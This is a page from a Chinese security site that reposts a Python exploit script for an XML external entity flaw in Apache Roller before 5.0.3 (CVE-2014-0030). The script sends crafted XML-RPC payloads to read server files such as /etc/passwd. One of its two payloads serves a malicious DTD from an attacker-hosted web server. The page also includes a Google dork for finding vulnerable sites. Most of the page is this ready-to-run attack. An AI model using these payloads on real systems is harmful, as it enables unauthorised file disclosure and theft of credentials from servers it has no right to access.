首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
来源:http://twitter.com/_MarkoJokic 作者:Jokic 发布时间:2018-09-07  
# Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
# Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}"
# Date: 2018-09-05
# Exploit Author: Marko Jokic
# Contact: http://twitter.com/_MarkoJokic
# Vendor Homepage: http://roller.apache.org/
# Software Link: http://archive.apache.org/dist/roller/
# Version: < 5.0.3
# Tested on: Linux Ubuntu 14.04.1
# CVE : CVE-2014-0030
 
# This exploit lets you read almost any file on a vulnerable server via XXE vulnerability.
# There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'.
# 'SIMPLE' payload will work in most cases and will be used by default, if
# server errors out, use 'ADVANCED' payload.
# 'ADVANCED' payload will start local web server and serve malicious XML which
# will be parsed by a target server.
# To successfully perform attack with 'ADVANCED' payload, make sure that port
# you listen on (--lport flag) is accessible out of the network.
 
#!/usr/bin/env python
 
import SimpleHTTPServer
import SocketServer
import argparse
import sys
import threading
from xml.etree import ElementTree
import urllib3
 
import requests
 
SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://{}">]>
<methodCall>
   <methodName>&xxe;</methodName>
</methodCall>
"""
 
ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY % start "<![CDATA[">
<!ENTITY % xxe SYSTEM "file://{}">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "{}">
%dtd;
]>
<methodCall>
   <methodName>&all;</methodName>
</methodCall>
"""
 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write('<!ENTITY all "%start;%xxe;%end;">')
 
def check_exploit(host):
    response = requests.post(host + "/roller-services/xmlrpc", verify=False)
    if response.status_code == 200:
        return True
    return False
 
def exploit(host, payload):
    response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False)
    xml_tree = ElementTree.fromstring(response.text)
    parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text
    print parsed_response
 
def start_web_server(port):
    handler = MyHandler
    httpd = SocketServer.TCPServer(('', port), handler, False)
    httpd.allow_reuse_address = True
    httpd.server_bind()
    httpd.server_activate()
    httpd.handle_request()
    httpd.shutdown()
 
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL")
    parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server")
    parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server")
    parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on")
    args = parser.parse_args()
 
    host = args.url
    full_file_path = args.file
 
    advanced = False
    lhost = args.lhost
    lport = args.lport
 
    if lport is not None and lport is not None:
        advanced = True
 
    check = check_exploit(host)
 
    if check:
        if advanced:
            th = threading.Thread(target=start_web_server, args=(lport,))
            th.daemon = True
            th.start()
 
            payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport))
        else:
            payload = SIMPLE_PAYLOAD.format(full_file_path)
 
        exploit(host, payload)
    else:
        print "[-] TARGET IS NOT VULNERABLE!"
 
main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Cisco Umbrella Roaming Client
·DVD Photo Slideshow Profession
·Ghostscript Failed Restore Com
·Microsoft people 10.1807.2131.
·FTPShell Server 6.80 - 'Add Ac
·FUJI XEROX DocuCentre-V 3065 P
·iSmartViewPro 1.5 - 'DDNS' Buf
·Wikipedia 12.0 - Denial of Ser
·Trend Micro Virtual Mobile Inf
·Microsoft Windows Explorer Out
·Symantec Mobile Encryption for
·Visual Ping 0.8.0.0 - 'Host' D
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved